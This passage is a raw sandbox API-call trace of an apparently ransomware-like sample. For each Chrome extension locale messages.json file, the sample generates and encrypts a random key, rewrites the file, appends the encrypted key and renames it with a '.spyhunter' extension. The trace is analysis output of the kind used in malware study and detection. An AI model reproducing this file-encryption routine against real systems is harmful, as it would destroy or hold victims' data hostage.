(HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.296] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f460*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f460*=0x30) returned 1 [0137.296] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.297] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json") returned 155 [0137.297] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.297] GetProcessHeap () returned 0x2c0000 [0137.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.297] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f424, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f424*=0xff, lpOverlapped=0x0) returned 1 [0137.298] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffff01, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.298] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xff, lpNumberOfBytesWritten=0x57f424, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f424*=0xff, lpOverlapped=0x0) returned 1 [0137.298] GetProcessHeap () returned 0x2c0000 [0137.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.298] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.298] WriteFile (in: hFile=0x18c, lpBuffer=0x57f464*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f424, lpOverlapped=0x0 | out: lpBuffer=0x57f464*, lpNumberOfBytesWritten=0x57f424*=0x4, lpOverlapped=0x0) returned 1 [0137.299] WriteFile (in: hFile=0x18c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f424, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f424*=0x30, lpOverlapped=0x0) returned 1 [0137.299] CloseHandle (hObject=0x18c) returned 1 [0137.299] GetProcessHeap () returned 0x2c0000 [0137.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.299] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json.spyhunter") returned 165 [0137.299] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json.spyhunter")) returned 1 [0137.300] GetProcessHeap () returned 0x2c0000 [0137.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.300] GetProcessHeap () returned 0x2c0000 [0137.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.300] GetProcessHeap () returned 0x2c0000 [0137.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f06a48 | out: hHeap=0x2c0000) returned 1 [0137.301] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f460 | out: pbBuffer=0x57f460) returned 1 [0137.301] GetProcessHeap () returned 0x2c0000 [0137.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.301] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f458*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f458*=0x30) returned 1 [0137.301] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.302] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json") returned 155 [0137.302] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.302] GetProcessHeap () returned 0x2c0000 [0137.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.302] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f41c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f41c*=0x98, lpOverlapped=0x0) returned 1 [0137.303] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffff68, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.303] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x98, lpNumberOfBytesWritten=0x57f41c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f41c*=0x98, lpOverlapped=0x0) returned 1 [0137.303] GetProcessHeap () returned 0x2c0000 [0137.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.303] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.303] WriteFile (in: hFile=0x18c, lpBuffer=0x57f45c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f41c, lpOverlapped=0x0 | out: lpBuffer=0x57f45c*, lpNumberOfBytesWritten=0x57f41c*=0x4, lpOverlapped=0x0) returned 1 [0137.303] WriteFile (in: hFile=0x18c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f41c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f41c*=0x30, lpOverlapped=0x0) returned 1 [0137.303] CloseHandle (hObject=0x18c) returned 1 [0137.304] GetProcessHeap () returned 0x2c0000 [0137.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.304] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json.spyhunter") returned 165 [0137.304] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json.spyhunter")) returned 1 [0137.304] GetProcessHeap () returned 0x2c0000 [0137.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.304] GetProcessHeap () returned 0x2c0000 [0137.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.305] GetProcessHeap () returned 0x2c0000 [0137.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f06738 | out: hHeap=0x2c0000) returned 1 [0137.306] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f458 | out: pbBuffer=0x57f458) returned 1 [0137.306] GetProcessHeap () returned 0x2c0000 [0137.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.306] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f450*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f450*=0x30) returned 1 [0137.306] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.306] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json") returned 155 [0137.307] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.307] GetProcessHeap () returned 0x2c0000 [0137.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.307] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f414, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f414*=0xd4, lpOverlapped=0x0) returned 1 [0137.307] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffff2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.308] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xd4, lpNumberOfBytesWritten=0x57f414, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f414*=0xd4, lpOverlapped=0x0) returned 1 [0137.308] GetProcessHeap () returned 0x2c0000 [0137.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.308] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.308] WriteFile (in: hFile=0x18c, lpBuffer=0x57f454*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f414, lpOverlapped=0x0 | out: lpBuffer=0x57f454*, lpNumberOfBytesWritten=0x57f414*=0x4, lpOverlapped=0x0) returned 1 [0137.308] WriteFile (in: hFile=0x18c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f414, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f414*=0x30, lpOverlapped=0x0) returned 1 [0137.308] CloseHandle (hObject=0x18c) returned 1 [0137.308] GetProcessHeap () returned 0x2c0000 [0137.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.308] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json.spyhunter") returned 165 [0137.308] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json.spyhunter")) returned 1 [0137.309] GetProcessHeap () returned 0x2c0000 [0137.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.309] GetProcessHeap () returned 0x2c0000 [0137.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.309] GetProcessHeap () returned 0x2c0000 [0137.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f06428 | out: hHeap=0x2c0000) returned 1 [0137.310] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f450 | out: pbBuffer=0x57f450) returned 1 [0137.311] GetProcessHeap () returned 0x2c0000 [0137.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.311] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f448*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f448*=0x30) returned 1 [0137.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.311] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json") returned 159 [0137.311] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.311] GetProcessHeap () returned 0x2c0000 [0137.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.311] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f40c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f40c*=0xe3, lpOverlapped=0x0) returned 1 [0137.312] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffff1d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.312] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x57f40c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f40c*=0xe3, lpOverlapped=0x0) returned 1 [0137.312] GetProcessHeap () returned 0x2c0000 [0137.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.313] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.313] WriteFile (in: hFile=0x18c, lpBuffer=0x57f44c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f40c, lpOverlapped=0x0 | out: lpBuffer=0x57f44c*, lpNumberOfBytesWritten=0x57f40c*=0x4, lpOverlapped=0x0) returned 1 [0137.313] WriteFile (in: hFile=0x18c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f40c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f40c*=0x30, lpOverlapped=0x0) returned 1 [0137.313] CloseHandle (hObject=0x18c) returned 1 [0137.313] GetProcessHeap () returned 0x2c0000 [0137.313] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.313] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json.spyhunter") returned 169 [0137.313] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json.spyhunter")) returned 1 [0137.314] GetProcessHeap () returned 0x2c0000 [0137.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.314] GetProcessHeap () returned 0x2c0000 [0137.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.314] GetProcessHeap () returned 0x2c0000 [0137.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f062a0 | out: hHeap=0x2c0000) returned 1 [0137.315] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f448 | out: pbBuffer=0x57f448) returned 1 [0137.315] GetProcessHeap () returned 0x2c0000 [0137.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.315] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f440*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f440*=0x30) returned 1 [0137.315] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.316] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json") returned 155 [0137.316] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.316] GetProcessHeap () returned 0x2c0000 [0137.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.316] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f404, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f404*=0xcc, lpOverlapped=0x0) returned 1 [0137.317] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffff34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.317] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xcc, lpNumberOfBytesWritten=0x57f404, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f404*=0xcc, lpOverlapped=0x0) returned 1 [0137.317] GetProcessHeap () returned 0x2c0000 [0137.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.317] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.317] WriteFile (in: hFile=0x18c, lpBuffer=0x57f444*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f404, lpOverlapped=0x0 | out: lpBuffer=0x57f444*, lpNumberOfBytesWritten=0x57f404*=0x4, lpOverlapped=0x0) returned 1 [0137.318] WriteFile (in: hFile=0x18c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f404, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f404*=0x30, lpOverlapped=0x0) returned 1 [0137.318] CloseHandle (hObject=0x18c) returned 1 [0137.318] GetProcessHeap () returned 0x2c0000 [0137.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.318] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json.spyhunter") returned 165 [0137.318] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json.spyhunter")) returned 1 [0137.319] GetProcessHeap () returned 0x2c0000 [0137.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.319] GetProcessHeap () returned 0x2c0000 [0137.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.319] GetProcessHeap () returned 0x2c0000 [0137.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f05f90 | out: hHeap=0x2c0000) returned 1 [0137.320] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f440 | out: pbBuffer=0x57f440) returned 1 [0137.320] GetProcessHeap () returned 0x2c0000 [0137.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.320] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f438*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f438*=0x30) returned 1 [0137.320] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_us\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.321] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json") returned 158 [0137.321] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.321] GetProcessHeap () returned 0x2c0000 [0137.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, 